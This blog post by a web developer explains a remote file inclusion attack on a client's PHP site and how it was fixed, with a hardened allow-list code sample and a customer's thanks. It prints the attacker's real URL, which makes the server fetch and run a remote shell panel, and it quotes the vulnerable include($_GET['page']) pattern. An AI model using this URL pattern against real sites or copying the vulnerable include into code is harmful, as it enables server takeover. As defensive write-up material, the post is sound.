Nasty PHP Exploit Rears Its Ugly Head (RFI Attack)

A panicked client of mine contacted me today with concerns about his website. Every few times we would load his company’s homepage, it would show an incorrect website. This site had links to p0rn and other subject matter that a fine business would deem unfit to put on the front page of its website. See the page that was being maliciously loaded here. So I got to work hunting down the source of the hijack.

With some help from the gurus at HostGator support, I finally found out how this was happening. The answer: RFI (“Remote File Inclusion”) Attack.

Most of our small websites we do in PHP. I pass off all of my PHP work to my code monkeys these days. The benefits and sanity that come from Ruby on Rails make it almost impossible for me to even look at PHP without feeling dizzy. The developer for this site unwittingly used a small piece of vulnerable code that basically allowed any hacker to make the website his own personal playground.

Vulnerable Code

What a lot of PHP developers don’t know is that the include() function will actually allow you to include even a remote file. So one could write include('http://apple.com');, for instance, and insert the code from Apple’s website into the body of their own site. And to take it one step further, the function doesn’t just include remote content. It also EXECUTES the included code.

This means that with a hole like this in your code, a hacker could write any PHP script they wanted to and then just include it in your URL and your web server will run it! And that’s exactly what our hacker did.

Malicious URL Used By Hacker

http://website.com/products.php?page=http://141.84.238.34/.../cmd?

Upon including “http://141.84.238.34/.../cmd?” at the end of the URL, it loaded up a simple yet impressive file management panel right in the middle of my beautiful website. Take a look. It’s really quite impressive. As you can see, from here the attacker can completely manipulate the entire filesystem and even execute shell commands on the server. This attacker used the opportunity to redirect visitors to a site in whose advertising revenue he or she presumably had some interest.

Well, the password has been changed and the vulnerability has been closed. I’m sure there is more than one way to secure this hole, but here is how I did it.

Cleaned Up Version (won’t execute remote code)
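The post’s own fixed code is not reproduced here, so as an added example (not the author’s code) here is the vulnerable pattern described above beside a hardened version that maps the `page` parameter onto a fixed allow-list instead of passing it to include(). The page names and the `pages/` directory are hypothetical.

```php
<?php
// Added example, not the original post's code. File names are hypothetical.

// --- Vulnerable pattern: the request parameter flows straight into include() ---
// products.php?page=http://<remote host>/cmd  -> remote file fetched AND executed
// (when allow_url_include is on); a relative path instead discloses local files.
// include($_GET['page']);

// --- Hardened version: the request value only selects an entry from an allow-list ---
$pages = [
    'home'     => 'pages/home.php',
    'products' => 'pages/products.php',
    'contact'  => 'pages/contact.php',
];

function resolvePage(array $pages, ?string $requested): string
{
    // Unknown or missing keys fall back to the home page; the raw request
    // value is never used as part of a filesystem path or URL.
    if ($requested === null || !array_key_exists($requested, $pages)) {
        return $pages['home'];
    }
    return $pages[$requested];
}

$page = resolvePage($pages, $_GET['page'] ?? null);

// Belt and braces: refuse anything that does not resolve to a regular file
// inside the application's own pages directory.
$base = realpath(__DIR__ . '/pages');
$real = realpath(__DIR__ . '/' . $page);
if ($real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(404);
    exit('Page not found');
}

include $real;
```

Independently of the application code, setting allow_url_include=Off in php.ini (the default since PHP 5.2) makes include() refuse URLs outright, so the remote case fails even if an injection point remains elsewhere.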

The full dish: RFI Attack on Wikipedia

Responses

I was the said "panicked customer" and just wanted to say thanks for fixing this. Having customers call us saying an insurance page was coming up was terrifying, especially when it could have very well been porn. Thanks Jon!
